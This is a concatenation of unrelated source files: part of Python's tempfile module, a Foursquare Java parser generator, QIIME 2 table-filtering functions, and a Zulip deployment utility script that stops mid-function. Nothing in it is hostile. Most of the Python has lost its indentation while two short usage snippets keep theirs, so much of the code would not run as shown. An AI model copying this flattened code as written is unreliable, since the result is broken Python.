sequence of unpredictable strings which can safely be incorporated
into file names. Each string is eight characters long. Multiple
threads can safely use the same instance at the same time.
_RandomNameSequence is an iterator."""
characters = "abcdefghijklmnopqrstuvwxyz0123456789_"
@property
def rng(self):
cur_pid = _os.getpid()
if cur_pid != getattr(self, '_rng_pid', None):
self._rng = _Random()
self._rng_pid = cur_pid
return self._rng
def __iter__(self):
return self
def __next__(self):
c = self.characters
choose = self.rng.choice
letters = [choose(c) for dummy in range(8)]
return ''.join(letters)
def _candidate_tempdir_list():
"""Generate a list of candidate temporary directories which
_get_default_tempdir will try."""
dirlist = []
# First, try the environment.
for envname in 'TMPDIR', 'TEMP', 'TMP':
dirname = _os.getenv(envname)
if dirname: dirlist.append(dirname)
# Failing that, try OS-specific locations.
if _os.name == 'nt':
dirlist.extend([ r'c:\temp', r'c:\tmp', r'\temp', r'\tmp' ])
elif _os.name != 'uwp_os':
dirlist.extend([ '/tmp', '/var/tmp', '/usr/tmp' ])
# As a last resort, the current directory.
try:
dirlist.append(_os.getcwd())
except (AttributeError, OSError):
dirlist.append(_os.curdir)
return dirlist
def _get_default_tempdir():
"""Calculate the default directory to use for temporary files.
This routine should be called exactly once.
We determine whether or not a candidate temp dir is usable by
trying to create and write to a file in that directory. If this
is successful, the test file is deleted. To prevent denial of
service, the name of the test file must be randomized."""
namer = _RandomNameSequence()
dirlist = _candidate_tempdir_list()
for dir in dirlist:
if dir != _os.curdir:
dir = _os.path.abspath(dir)
# Try only a few names per directory.
for seq in range(100):
name = next(namer)
filename = _os.path.join(dir, name)
try:
fd = _os.open(filename, _bin_openflags, 0o600)
try:
try:
with _io.open(fd, 'wb', closefd=False) as fp:
fp.write(b'blat')
finally:
_os.close(fd)
finally:
_os.unlink(filename)
return dir
except FileExistsError:
pass
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
break # no point trying more names in this directory
except OSError:
break # no point trying more names in this directory
raise FileNotFoundError(_errno.ENOENT,
"No usable temporary directory found in %s" %
dirlist)
_name_sequence = None
def _get_candidate_names():
"""Common setup sequence for all user-callable interfaces."""
global _name_sequence
if _name_sequence is None:
_once_lock.acquire()
try:
if _name_sequence is None:
_name_sequence = _RandomNameSequence()
finally:
_once_lock.release()
return _name_sequence
def _mkstemp_inner(dir, pre, suf, flags, output_type):
"""Code common to mkstemp, TemporaryFile, and NamedTemporaryFile."""
names = _get_candidate_names()
if output_type is bytes:
names = map(_os.fsencode, names)
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, pre + name + suf)
try:
fd = _os.open(file, flags, 0o600)
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
else:
raise
return (fd, _os.path.abspath(file))
raise FileExistsError(_errno.EEXIST,
"No usable temporary file name found")
# User visible interfaces.
def gettempprefix():
"""The default prefix for temporary directories."""
return template
def gettempprefixb():
"""The default prefix for temporary directories as bytes."""
return _os.fsencode(gettempprefix())
tempdir = None
def gettempdir():
"""Accessor for tempfile.tempdir."""
global tempdir
if tempdir is None:
_once_lock.acquire()
try:
if tempdir is None:
tempdir = _get_default_tempdir()
finally:
_once_lock.release()
return tempdir
def gettempdirb():
"""A bytes version of tempfile.gettempdir()."""
return _os.fsencode(gettempdir())
def mkstemp(suffix=None, prefix=None, dir=None, text=False):
"""User-callable function to create and return a unique temporary
file. The return value is a pair (fd, name) where fd is the
file descriptor returned by os.open, and name is the filename.
If 'suffix' is specified, the file name will end with that suffix,
otherwise there will be no suffix.
If 'prefix' is specified, the file name will begin with that prefix,
otherwise a default prefix is used.
If 'dir' is specified, the file will be created in that directory,
otherwise a default directory is used.
If 'text' is specified and true, the file is opened in text
mode. Else (the default) the file is opened in binary mode. On
some operating systems, this makes no difference.
suffix, prefix and dir must all contain the same type if specified.
If they are bytes, the returned name will be bytes; str otherwise.
A value of None will cause an appropriate default to be used.
The file is readable and writable only by the creating user ID.
If the operating system uses permission bits to indicate whether a
file is executable, the file is executable by no one. The file
descriptor is not inherited by children of this process.
Caller is responsible for deleting the file when done with it.
"""
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
if text:
flags = _text_openflags
else:
flags = _bin_openflags
return _mkstemp_inner(dir, prefix, suffix, flags, output_type)
def mkdtemp(suffix=None, prefix=None, dir=None):
"""User-callable function to create and return a unique temporary
directory. The return value is the pathname of the directory.
Arguments are as for mkstemp, except that the 'text' argument is
not accepted.
The directory is readable, writable, and searchable only by the
creating user.
Caller is responsible for deleting the directory when done with it.
"""
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
names = _get_candidate_names()
if output_type is bytes:
names = map(_os.fsencode, names)
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
try:
_os.mkdir(file, 0o700)
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
else:
raise
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary directory name found")
def mktemp(suffix="", prefix=template, dir=None):
"""User-callable function to return a unique temporary file name. The
file is not created.
Arguments are as for mkstemp, except that the 'text' argument is
not accepted.
THIS FUNCTION IS UNSAFE AND SHOULD NOT BE USED. The file name may
refer to a file that did not exist at some point, but by the time
you get around to creating it, someone else may have beaten you to
the punch.
"""
## from warnings import warn as _warn
## _warn("mktemp is a potential security risk to your program",
## RuntimeWarning, stacklevel=2)
if dir is None:
dir = gettempdir()
names = _get_candidate_names()
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
if not _exists(file):
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary filename found")
class _TemporaryFileCloser:
"""A separate object allowing proper closing of a temporary file's
underlying file object, without adding a __del__ method to the
temporary file."""
file = None # Set here since __del__ checks it
close_called = False
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.delete = delete
# NT provides delete-on-close as a primitive, so we don't need
# the wrapper to do anything special. We still use it so that
# file.name is useful (i.e. not "(fdopen)") with NamedTemporaryFile.
if _os.name != 'nt' and _os.name != 'uwp_os':
# Cache the unlinker so we don't get spurious errors at
# shutdown when the module-level "os" is None'd out. Note
# that this must be referenced as self.unlink, because the
# name TemporaryFileWrapper may also get None'd out before
# __del__ is called.
def close(self, unlink=_os.unlink):
if not self.close_called and self.file is not None:
self.close_called = True
try:
self.file.close()
finally:
if self.delete:
unlink(self.name)
# Need to ensure the file is deleted on __del__
def __del__(self):
self.close()
else:
def close(self):
if not self.close_called:
self.close_called = True
self.file.close()
class _TemporaryFileWrapper:
"""Temporary file wrapper
This class provides a wrapper around files opened for
temporary use. In particular, it seeks to automatically
remove the file when it is no longer needed.
"""
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.delete = delete
self._closer = _TemporaryFileCloser(file, name, delete)
def __getattr__(self, name):
# Attribute lookups are delegated to the underlying file
# and cached for non-numeric results
# (i.e. methods are cached, closed and friends are not)
file = self.__dict__['file']
a = getattr(file, name)
if hasattr(a, '__call__'):
func = a
@_functools.wraps(func)
def func_wrapper(*args, **kwargs):
return func(*args, **kwargs)
# Avoid closing the file as long as the wrapper is alive,
# see issue #18879.
func_wrapper._closer = self._closer
a = func_wrapper
if not isinstance(a, int):
setattr(self, name, a)
return a
# The underlying __enter__ method returns the wrong object
# (self.file) so override it to return the wrapper
def __enter__(self):
self.file.__enter__()
return self
# Need to trap __exit__ as well to ensure the file gets
# deleted when used in a with statement
def __exit__(self, exc, value, tb):
result = self.file.__exit__(exc, value, tb)
self.close()
return result
def close(self):
"""
Close the temporary file, possibly deleting it.
"""
self._closer.close()
# iter() doesn't use __getattr__ to find the __iter__ method
def __iter__(self):
# Don't return iter(self.file), but yield from it to avoid closing
# file as long as it's being used as iterator (see issue #23700). We
# can't use 'yield from' here because iter(file) returns the file
# object itself, which has a close method, and thus the file would get
# closed when the generator is finalized, due to PEP380 semantics.
for line in self.file:
yield line
def NamedTemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix=None, prefix=None,
dir=None, delete=True):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
'delete' -- whether the file is deleted on close (default True).
The file is created as mkstemp() would do it.
Returns an object with a file-like interface; the name of the file
is accessible as file.name. The file will be automatically deleted
when it is closed unless the 'delete' argument is set to False.
"""
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
flags = _bin_openflags
# Setting O_TEMPORARY in the flags causes the OS to delete
# the file when it is closed. This is only supported by Windows.
if (_os.name == 'nt' or _os.name == 'uwp_os') and delete:
flags |= _os.O_TEMPORARY
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags, output_type)
try:
file = _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
return _TemporaryFileWrapper(file, name, delete)
except Exception:
_os.close(fd)
raise
if _os.name != 'posix' or _os.sys.platform == 'cygwin':
# On non-POSIX and Cygwin systems, assume that we cannot unlink a file
# while it is open.
TemporaryFile = NamedTemporaryFile
else:
# Is the O_TMPFILE flag available and does it work?
# The flag is set to False if os.open(dir, os.O_TMPFILE) raises an
# IsADirectoryError exception
_O_TMPFILE_WORKS = hasattr(_os, 'O_TMPFILE')
def TemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix=None, prefix=None,
dir=None):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
The file is created as mkstemp() would do it.
Returns an object with a file-like interface. The file has no
name, and will cease to exist when it is closed.
"""
global _O_TMPFILE_WORKS
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
flags = _bin_openflags
if _O_TMPFILE_WORKS:
try:
flags2 = (flags | _os.O_TMPFILE) & ~_os.O_CREAT
fd = _os.open(dir, flags2, 0o600)
except IsADirectoryError:
# Linux kernel older than 3.11 ignores O_TMPFILE flag.
# Set flag to False to not try again.
_O_TMPFILE_WORKS = False
except OSError:
# The filesystem of the directory does not support O_TMPFILE.
# For example, OSError(95, 'Operation not supported').
pass
else:
try:
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
# Fallback to _mkstemp_inner().
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags, output_type)
try:
_os.unlink(name)
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
class SpooledTemporaryFile:
"""Temporary file wrapper, specialized to switch from BytesIO
or StringIO to a real file when it exceeds a certain size or
when a fileno is needed.
"""
_rolled = False
def __init__(self, max_size=0, mode='w+b', buffering=-1,
encoding=None, newline=None,
suffix=None, prefix=None, dir=None):
if 'b' in mode:
self._file = _io.BytesIO()
else:
# Setting newline="\n" avoids newline translation;
# this is important because otherwise on Windows we'd
# get double newline translation upon rollover().
self._file = _io.StringIO(newline="\n")
self._max_size = max_size
self._rolled = False
self._TemporaryFileArgs = {'mode': mode, 'buffering': buffering,
'suffix': suffix, 'prefix': prefix,
'encoding': encoding, 'newline': newline,
'dir': dir}
def _check(self, file):
if self._rolled: return
max_size = self._max_size
if max_size and file.tell() > max_size:
self.rollover()
def rollover(self):
if self._rolled: return
file = self._file
newfile = self._file = TemporaryFile(**self._TemporaryFileArgs)
del self._TemporaryFileArgs
newfile.write(file.getvalue())
newfile.seek(file.tell(), 0)
self._rolled = True
# The method caching trick from NamedTemporaryFile
# won't work here, because _file may change from a
# BytesIO/StringIO instance to a real file. So we list
# all the methods directly.
# Context management protocol
def __enter__(self):
if self._file.closed:
raise ValueError("Cannot enter context with closed file")
return self
def __exit__(self, exc, value, tb):
self._file.close()
# file protocol
def __iter__(self):
return self._file.__iter__()
def close(self):
self._file.close()
@property
def closed(self):
return self._file.closed
@property
def encoding(self):
try:
return self._file.encoding
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['encoding']
def fileno(self):
self.rollover()
return self._file.fileno()
def flush(self):
self._file.flush()
def isatty(self):
return self._file.isatty()
@property
def mode(self):
try:
return self._file.mode
except AttributeError:
return self._TemporaryFileArgs['mode']
@property
def name(self):
try:
return self._file.name
except AttributeError:
return None
@property
def newlines(self):
try:
return self._file.newlines
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['newline']
def read(self, *args):
return self._file.read(*args)
def readline(self, *args):
return self._file.readline(*args)
def readlines(self, *args):
return self._file.readlines(*args)
def seek(self, *args):
self._file.seek(*args)
@property
def softspace(self):
return self._file.softspace
def tell(self):
return self._file.tell()
def truncate(self, size=None):
if size is None:
self._file.truncate()
else:
if size > self._max_size:
self.rollover()
self._file.truncate(size)
def write(self, s):
file = self._file
rv = file.write(s)
self._check(file)
return rv
def writelines(self, iterable):
file = self._file
rv = file.writelines(iterable)
self._check(file)
return rv
class TemporaryDirectory(object):
"""Create and return a temporary directory. This has the same
behavior as mkdtemp but can be used as a context manager. For
example:
with TemporaryDirectory() as tmpdir:
...
Upon exiting the context, the directory and everything contained
in it are removed.
"""
def __init__(self, suffix=None, prefix=None, dir=None):
self.name = mkdtemp(suffix, prefix, dir)
self._finalizer = _weakref.finalize(
self, self._cleanup, self.name,
warn_message="Implicitly cleaning up {!r}".format(self))
@classmethod
def _cleanup(cls, name, warn_message):
_shutil.rmtree(name)
_warnings.warn(warn_message, ResourceWarning)
def __repr__(self):
return "<{} {!r}>".format(self.__class__.__name__, self.name)
def __enter__(self):
return self.name
def __exit__(self, exc, value, tb):
self.cleanup()
def cleanup(self):
if self._finalizer.detach():
_shutil.rmtree(self.name)
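# Illustrative usage of the interfaces defined above (a sketch, not part of
# the module): both objects clean up after themselves when the context exits.
if __name__ == '__main__':
    with TemporaryDirectory(prefix='demo-') as _tmpdir:
        print('created directory', _tmpdir)   # removed on context exit
    with NamedTemporaryFile(suffix='.txt') as _f:
        _f.write(b'hello')                    # deleted on close by default
        print('wrote to', _f.name)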
|
#!/usr/bin/python
import datetime
import sys
import textwrap
import common
from xml.dom import pulldom
PARSER = """\
/**
* Copyright 2009 Joe LaPenna
*/
package com.joelapenna.foursquare.parsers;
import com.joelapenna.foursquare.Foursquare;
import com.joelapenna.foursquare.error.FoursquareError;
import com.joelapenna.foursquare.error.FoursquareParseException;
import com.joelapenna.foursquare.types.%(type_name)s;
import org.xmlpull.v1.XmlPullParser;
import org.xmlpull.v1.XmlPullParserException;
import java.io.IOException;
import java.util.logging.Level;
import java.util.logging.Logger;
/**
* Auto-generated: %(timestamp)s
*
* @author Joe LaPenna (joe@joelapenna.com)
* @param <T>
*/
public class %(type_name)sParser extends AbstractParser<%(type_name)s> {
private static final Logger LOG = Logger.getLogger(%(type_name)sParser.class.getCanonicalName());
private static final boolean DEBUG = Foursquare.PARSER_DEBUG;
@Override
public %(type_name)s parseInner(XmlPullParser parser) throws XmlPullParserException, IOException,
FoursquareError, FoursquareParseException {
parser.require(XmlPullParser.START_TAG, null, null);
%(type_name)s %(top_node_name)s = new %(type_name)s();
while (parser.nextTag() == XmlPullParser.START_TAG) {
String name = parser.getName();
%(stanzas)s
} else {
// Consume something we don't understand.
if (DEBUG) LOG.log(Level.FINE, "Found tag that we don't recognize: " + name);
skipSubTree(parser);
}
}
return %(top_node_name)s;
}
}"""
BOOLEAN_STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(Boolean.valueOf(parser.nextText()));
"""
GROUP_STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(new GroupParser(new %(sub_parser_camel_case)s()).parse(parser));
"""
COMPLEX_STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(new %(parser_name)s().parse(parser));
"""
STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(parser.nextText());
"""
def main():
type_name, top_node_name, attributes = common.WalkNodesForAttributes(
sys.argv[1])
GenerateClass(type_name, top_node_name, attributes)
def GenerateClass(type_name, top_node_name, attributes):
"""generate it.
type_name: the type of object the parser returns
top_node_name: the name of the object the parser returns.
per common.WalkNodsForAttributes
"""
stanzas = []
for name in sorted(attributes):
typ, children = attributes[name]
replacements = Replacements(top_node_name, name, typ, children)
if typ == common.BOOLEAN:
stanzas.append(BOOLEAN_STANZA % replacements)
elif typ == common.GROUP:
stanzas.append(GROUP_STANZA % replacements)
elif typ in common.COMPLEX:
stanzas.append(COMPLEX_STANZA % replacements)
else:
stanzas.append(STANZA % replacements)
if stanzas:
# pop off the extraneous } else for the first conditional stanza.
stanzas[0] = stanzas[0].replace('} else ', '', 1)
replacements = Replacements(top_node_name, name, typ, [None])
replacements['stanzas'] = '\n'.join(stanzas).strip()
print(PARSER % replacements)
def Replacements(top_node_name, name, typ, children):
# CamelCaseClassName
type_name = ''.join([word.capitalize() for word in top_node_name.split('_')])
# CamelCaseClassName
camel_name = ''.join([word.capitalize() for word in name.split('_')])
# camelCaseLocalName
attribute_name = camel_name[0].lower() + camel_name[1:]
# mFieldName
field_name = 'm' + camel_name
if children[0]:
sub_parser_camel_case = children[0] + 'Parser'
else:
sub_parser_camel_case = (camel_name[:-1] + 'Parser')
return {
'type_name': type_name,
'name': name,
'top_node_name': top_node_name,
'camel_name': camel_name,
'parser_name': typ + 'Parser',
'attribute_name': attribute_name,
'field_name': field_name,
'typ': typ,
'timestamp': datetime.datetime.now(),
'sub_parser_camel_case': sub_parser_camel_case,
'sub_type': children[0]
}
if __name__ == '__main__':
main()
|
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2020, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import biom
import qiime2
import numpy as np
import pandas as pd
def _get_biom_filter_function(ids_to_keep, min_frequency, max_frequency,
min_nonzero, max_nonzero):
ids_to_keep = set(ids_to_keep)
if max_frequency is None:
max_frequency = np.inf
if max_nonzero is None:
max_nonzero = np.inf
def f(data_vector, id_, metadata):
return (id_ in ids_to_keep) and \
(min_frequency <= data_vector.sum() <= max_frequency) and \
(min_nonzero <= (data_vector > 0).sum() <= max_nonzero)
return f
_other_axis_map = {'sample': 'observation', 'observation': 'sample'}
def _filter_table(table, min_frequency, max_frequency, min_nonzero,
max_nonzero, metadata, where, axis, exclude_ids=False):
if min_frequency == 0 and max_frequency is None and min_nonzero == 0 and\
max_nonzero is None and metadata is None and where is None and\
exclude_ids is False:
raise ValueError("No filtering was requested.")
if metadata is None and where is not None:
raise ValueError("Metadata must be provided if 'where' is "
"specified.")
if metadata is None and exclude_ids is True:
raise ValueError("Metadata must be provided if 'exclude_ids' "
"is True.")
if metadata is not None:
ids_to_keep = metadata.get_ids(where=where)
else:
ids_to_keep = table.ids(axis=axis)
if exclude_ids is True:
ids_to_keep = set(table.ids(axis=axis)) - set(ids_to_keep)
filter_fn1 = _get_biom_filter_function(
ids_to_keep, min_frequency, max_frequency, min_nonzero, max_nonzero)
table.filter(filter_fn1, axis=axis, inplace=True)
# filter on the opposite axis to remove any entities that now have a
# frequency of zero
filter_fn2 = _get_biom_filter_function(
ids_to_keep=table.ids(axis=_other_axis_map[axis]), min_frequency=0,
max_frequency=None, min_nonzero=1, max_nonzero=None)
table.filter(filter_fn2, axis=_other_axis_map[axis], inplace=True)
def filter_samples(table: biom.Table, min_frequency: int = 0,
max_frequency: int = None, min_features: int = 0,
max_features: int = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False)\
-> biom.Table:
_filter_table(table=table, min_frequency=min_frequency,
max_frequency=max_frequency, min_nonzero=min_features,
max_nonzero=max_features, metadata=metadata,
where=where, axis='sample', exclude_ids=exclude_ids)
return table
def filter_features(table: biom.Table, min_frequency: int = 0,
max_frequency: int = None, min_samples: int = 0,
max_samples: int = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False)\
-> biom.Table:
_filter_table(table=table, min_frequency=min_frequency,
max_frequency=max_frequency, min_nonzero=min_samples,
max_nonzero=max_samples, metadata=metadata,
where=where, axis='observation', exclude_ids=exclude_ids)
return table
def filter_seqs(data: pd.Series, table: biom.Table = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False) -> pd.Series:
if table is not None and metadata is not None:
raise ValueError('Filtering with metadata and filtering with a table '
'are mutually exclusive.')
elif table is None and metadata is None:
raise ValueError('No filtering requested. Must provide either table '
'or metadata.')
elif table is not None:
ids_to_keep = table.ids(axis='observation')
else:
# Note, no need to check for missing feature IDs in the metadata,
# because that is basically the point of this method.
ids_to_keep = metadata.get_ids(where=where)
if exclude_ids is True:
ids_to_keep = set(data.index) - set(ids_to_keep)
filtered = data[data.index.isin(ids_to_keep)]
if filtered.empty is True:
raise ValueError('All features were filtered out of the data.')
return filtered
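# ----------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). The table data,
# IDs, and the helper name below are made up purely for demonstration.
# ----------------------------------------------------------------------------
def _example_filter_samples():
    table = biom.Table(np.array([[0, 1, 2], [3, 0, 0]]),
                       observation_ids=['O1', 'O2'],
                       sample_ids=['S1', 'S2', 'S3'])
    # Keep samples whose total frequency is at least 2: S1 (sum 3) and S3 (sum 2)
    # pass, S2 (sum 1) is dropped. Features left with only zeros are then removed
    # by the second, opposite-axis pass inside _filter_table.
    filtered = filter_samples(table, min_frequency=2)
    return filtered.ids(axis='sample')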
|
#!/usr/bin/env python3
import argparse
import configparser
import datetime
import functools
import hashlib
import json
import logging
import os
import pwd
import random
import re
import shlex
import shutil
import subprocess
import sys
import time
import uuid
from typing import Any, Dict, List, Sequence, Set
from urllib.parse import SplitResult
DEPLOYMENTS_DIR = "/home/zulip/deployments"
LOCK_DIR = os.path.join(DEPLOYMENTS_DIR, "lock")
TIMESTAMP_FORMAT = '%Y-%m-%d-%H-%M-%S'
# Color codes
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BLACKONYELLOW = '\x1b[0;30;43m'
WHITEONRED = '\x1b[0;37;41m'
BOLDRED = '\x1B[1;31m'
GREEN = '\x1b[32m'
YELLOW = '\x1b[33m'
BLUE = '\x1b[34m'
MAGENTA = '\x1b[35m'
CYAN = '\x1b[36m'
def overwrite_symlink(src: str, dst: str) -> None:
dir, base = os.path.split(dst)
while True:
# Note: creating a temporary filename like this is not generally
        # secure. It's fine in this case because os.symlink refuses to
# overwrite an existing target; we handle the error and try again.
tmp = os.path.join(dir, ".{}.{:010x}".format(base, random.randrange(1 << 40)))
try:
os.symlink(src, tmp)
except FileExistsError:
continue
break
try:
os.rename(tmp, dst)
except Exception:
os.remove(tmp)
raise
def parse_cache_script_args(description: str) -> argparse.Namespace:
# Keep this in sync with clean_unused_caches in provision_inner.py
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"--threshold", dest="threshold_days", type=int, default=14,
metavar="<days>", help="Any cache which is not in "
"use by a deployment not older than threshold days(current "
"installation in dev) and older than threshold days will be "
"deleted. (defaults to 14)")
parser.add_argument(
"--dry-run", action="store_true",
help="If specified then script will only print the caches "
"that it will delete/keep back. It will not delete any cache.")
parser.add_argument(
"--verbose", action="store_true",
help="If specified then script will print a detailed report "
"of what is being will deleted/kept back.")
parser.add_argument(
"--no-print-headings", dest="no_headings", action="store_true",
help="If specified then script will not print headings for "
"what will be deleted/kept back.")
args = parser.parse_args()
args.verbose |= args.dry_run # Always print a detailed report in case of dry run.
return args
def get_deploy_root() -> str:
return os.path.realpath(
os.path.normpath(os.path.join(os.path.dirname(__file__), "..", "..")),
)
def get_deployment_version(extract_path: str) -> str:
version = '0.0.0'
for item in os.listdir(extract_path):
item_path = os.path.join(extract_path, item)
if item.startswith('zulip-server') and os.path.isdir(item_path):
with open(os.path.join(item_path, 'version.py')) as f:
result = re.search('ZULIP_VERSION = "(.*)"', f.read())
if result:
version = result.groups()[0]
break
return version
def is_invalid_upgrade(current_version: str, new_version: str) -> bool:
if new_version > '1.4.3' and current_version <= '1.3.10':
return True
return False
def subprocess_text_output(args: Sequence[str]) -> str:
return subprocess.check_output(args, universal_newlines=True).strip()
def get_zulip_pwent() -> pwd.struct_passwd:
deploy_root_uid = os.stat(get_deploy_root()).st_uid
if deploy_root_uid != 0:
return pwd.getpwuid(deploy_root_uid)
# In the case that permissions got messed up and the deployment
    # directory is unexpectedly owned by root, we fall back to the
# `zulip` user as that's the correct value in production.
return pwd.getpwnam("zulip")
def get_postgres_pwent() -> pwd.struct_passwd:
try:
return pwd.getpwnam("postgres")
except KeyError:
return get_zulip_pwent()
def su_to_zulip(save_suid: bool = False) -> None:
"""Warning: su_to_zulip assumes that the zulip checkout is owned by
the zulip user (or whatever normal user is running the Zulip
installation). It should never be run from the installer or other
production contexts before /home/zulip/deployments/current is
created."""
pwent = get_zulip_pwent()
os.setgid(pwent.pw_gid)
if save_suid:
os.setresuid(pwent.pw_uid, pwent.pw_uid, os.getuid())
else:
os.setuid(pwent.pw_uid)
os.environ['HOME'] = pwent.pw_dir
def make_deploy_path() -> str:
timestamp = datetime.datetime.now().strftime(TIMESTAMP_FORMAT)
return os.path.join(DEPLOYMENTS_DIR, timestamp)
TEMPLATE_DATABASE_DIR = "test-backend/databases"
def get_dev_uuid_var_path(create_if_missing: bool = False) -> str:
zulip_path = get_deploy_root()
uuid_path = os.path.join(os.path.realpath(os.path.dirname(zulip_path)), ".zulip-dev-uuid")
if os.path.exists(uuid_path):
with open(uuid_path) as f:
zulip_uuid = f.read().strip()
else:
if create_if_missing:
zulip_uuid = str(uuid.uuid4())
# We need root access here, since the path will be under /srv/ in the
# development environment.
run_as_root(["sh", "-c", 'echo "$1" > "$2"', "-",
zulip_uuid, uuid_path])
else:
raise AssertionError("Missing UUID file; please run tools/provision!")
result_path = os.path.join(zulip_path, "var", zulip_uuid)
os.makedirs(result_path, exist_ok=True)
return result_path
def get_deployment_lock(error_rerun_script: str) -> None:
start_time = time.time()
got_lock = False
while time.time() - start_time < 300:
try:
os.mkdir(LOCK_DIR)
got_lock = True
break
except OSError:
print(WARNING + "Another deployment in progress; waiting for lock... " +
"(If no deployment is running, rmdir {})".format(LOCK_DIR) + ENDC)
sys.stdout.flush()
time.sleep(3)
if not got_lock:
print(FAIL + "Deployment already in progress. Please run\n" +
" {}\n".format(error_rerun_script) +
"manually when the previous deployment finishes, or run\n" +
" rmdir {}\n".format(LOCK_DIR) +
"if the previous deployment crashed." +
ENDC)
sys.exit(1)
def release_deployment_lock() -> None:
shutil.rmtree(LOCK_DIR)
def run(args: Sequence[str], **kwargs: Any) -> None:
# Output what we're doing in the `set -x` style
print("+ {}".format(" ".join(map(shlex.quote, args))))
try:
subprocess.check_call(args, **kwargs)
except subprocess.CalledProcessError:
print()
print(WHITEONRED + "Error running a subcommand of {}: {}".format(
sys.argv[0], " ".join(map(shlex.quote, args)),
) + ENDC)
print(WHITEONRED + "Actual error output for the subcommand is just above this." +
ENDC)
print()
raise
def log_management_command(cmd: str, log_path: str) -> None:
log_dir = os.path.dirname(log_path)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
formatter = logging.Formatter("%(asctime)s: %(message)s")
file_handler = logging.FileHandler(log_path)
file_handler.setFormatter(formatter)
logger = logging.getLogger("zulip.management")
logger.addHandler(file_handler)
logger.setLevel(logging.INFO)
logger.info("Ran '%s'", cmd)
def get_environment() -> str:
if os.path.exists(DEPLOYMENTS_DIR):
return "prod"
return "dev"
def get_recent_deployments(threshold_days: int) -> Set[str]:
    # Returns the set of deployments not older than threshold_days,
    # including the `/root/zulip` directory if it exists.
recent = set()
threshold_date = datetime.datetime.now() - datetime.timedelta(days=threshold_days)
for dir_name in os.listdir(DEPLOYMENTS_DIR):
target_dir = os.path.join(DEPLOYMENTS_DIR, dir_name)
if not os.path.isdir(target_dir):
# Skip things like uwsgi sockets, symlinks, etc.
continue
if not os.path.exists(os.path.join(target_dir, "zerver")):
# Skip things like "lock" that aren't actually a deployment directory
continue
try:
date = datetime.datetime.strptime(dir_name, TIMESTAMP_FORMAT)
if date >= threshold_date:
recent.add(target_dir)
except ValueError:
# Always include deployments whose name is not in the format of a timestamp.
recent.add(target_dir)
# If it is a symlink then include the target as well.
if os.path.islink(target_dir):
recent.add(os.path.realpath(target_dir))
if os.path.exists("/root/zulip"):
recent.add("/root/zulip")
return recent
def get_threshold_timestamp(threshold_days: int) -> int:
    # Given a number of days, return the Unix timestamp corresponding
    # to the point in time that many days ago.
threshold = datetime.datetime.now() - datetime.timedelta(days=threshold_days)
threshold_timestamp = int(time.mktime(threshold.utctimetuple()))
return threshold_timestamp
def get_caches_to_be_purged(caches_dir: str, caches_in_use: Set[str], threshold_days: int) -> Set[str]:
    # Given a directory containing caches, the set of caches in use,
    # and a threshold in days, return the set of caches that can be
    # purged. A cache is removed only if it is:
    # 1: Not in use by the current installation (in dev as well as in prod).
    # 2: Not in use by any deployment newer than `threshold_days` (in prod).
    # 3: Not in use by '/root/zulip'.
    # 4: Older than `threshold_days`.
caches_to_purge = set()
